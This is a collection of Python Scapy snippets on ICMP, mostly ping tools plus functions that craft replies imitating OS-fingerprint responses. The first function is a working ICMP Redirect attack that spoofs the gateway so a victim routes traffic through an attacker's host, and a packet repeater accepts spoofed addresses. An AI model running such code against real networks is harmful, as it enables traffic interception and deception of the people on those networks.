def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute): """Try ICMP Redirect attack Args: ip_gw (str): Gateway IP ip_victim (str) : Target/Victim IP ip_attacker (str) : Attacker IP ip_targetroute (str) : IP of network to reach in ICMP payload interface ??? """ ip = IP() ip.src = ip_gw ip.dst = ip_victim icmp = ICMP() icmp.type = 5 icmp.code = 1 icmp.gw = ip_attacker ip2 = IP() ip2.src = ip_victim ip2.dst = ip_targetroute icmp2 = ICMP() icmp2.type = 0 icmp2.code = 0 # Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets. send(ip / icmp / ip2 / icmp2, iface="eth1")
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose): """The classic ping tool that send ICMP echo requests. \b # habu.icmp.ping 8.8.8.8 IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding """ if interface: conf.iface = interface conf.verb = False conf.L3socket = L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del (ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def udp_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['U1']['TTL'], 16) ip.flags = fp.probe['U1']['DF'] ip.len = 56 ip.id = 4162 icmp = ICMP() icmp.type = 3 icmp.unused = 0 icmp.code = 13 # code 3 for reply iperror = IPerror() iperror.proto = 'udp' iperror.ttl = 0x3E iperror.len = fp.probe['U1']['RIPL'] iperror.id = fp.probe['U1']['RID'] ripck_val = fp.probe['U1']['RIPCK'] if ripck_val == 'G': pass elif ripck_val == 'Z': iperror.chksum = 0 else: iperror.chksum = pkt[IP].chksum udperror = UDPerror() udperror.sport = pkt[UDP].sport udperror.dport = pkt[UDP].dport udperror.len = pkt[UDP].len if fp.probe['U1']['RUCK'] == 'G': udperror.chksum = pkt[UDP].chksum else: udperror.chksum = fp.probe['U1']['RUCK'] try: ipl = int(fp.probe['U1']['IPL'], 16) except KeyError: ipl = None data = pkt[Raw].load fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data return fin_pkt
def cmd_ping(ip, interface, count, timeout, wait, verbose): """The classic ping tool that send ICMP echo requests. \b # habu.ping 8.8.8.8 IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding """ if interface: conf.iface = interface conf.verb = False conf.L3socket=L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del(ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def icmp_craft(pkt, fp, mac): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['IE']['TTL'], 16) dfi_flag = fp.probe['IE']['DFI'] if dfi_flag == 'N': ip.flags = 0 elif dfi_flag == 'S': ip.flags = pkt[IP].flags elif dfi_flag == 'Y': ip.flags = 2 else: ip.flags = 0 if pkt[IP].flags == 2 else 2 ip.id = fp.ip_id_icmp_gen() icmp = ICMP() icmp.type = 0 icmp.id = pkt[ICMP].id cd_val = fp.probe['IE']['CD'] if cd_val == 'Z': icmp.code = 0 elif cd_val == 'S': icmp.code = pkt[ICMP].code else: icmp.code = random.randint(0, 15) icmp.seq = pkt[ICMP].seq data = pkt[ICMP].payload fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data return fin_pkt
def cmd_ping(ip, interface, count, timeout, wait, verbose): if interface: conf.iface = interface conf.verb = False conf.L3socket = L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del (ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
#!/usr/bin/python import sys from scapy.all import IP, ICMP, sr1 # Give IP when running this if len(sys.argv) != 2: print("Usage: " + sys.argv[0] + " ip") sys.exit(1) # Craft IP header ip_packet = IP() ip_packet.dst = sys.argv[1] icmp_packet = ICMP() icmp_packet.code = 1 sr1(ip_packet / icmp_packet / "abcdefghijklmnopqrstuvwxyz")
#*** Get parameters from command line SRC_MAC = sys.argv[1] DST_MAC = sys.argv[2] SRC_IP = sys.argv[3] DST_IP = sys.argv[4] IF_NAME = sys.argv[5] REPEAT_INTERVAL = float(sys.argv[6]) REPEAT_COUNT = int(sys.argv[7]) data = "blahblahblah" # define ip and icmp eth = Ether() eth.src=SRC_MAC eth.dst=DST_MAC ip = IP() ip.src = SRC_IP ip.dst = DST_IP icmp = ICMP() icmp.type = 8 icmp.code = 0 finished = 0 count = 0 while not finished: sendp(eth/ip/icmp/data, iface=IF_NAME) time.sleep(REPEAT_INTERVAL) count += 1 if count >= REPEAT_COUNT: finished = 1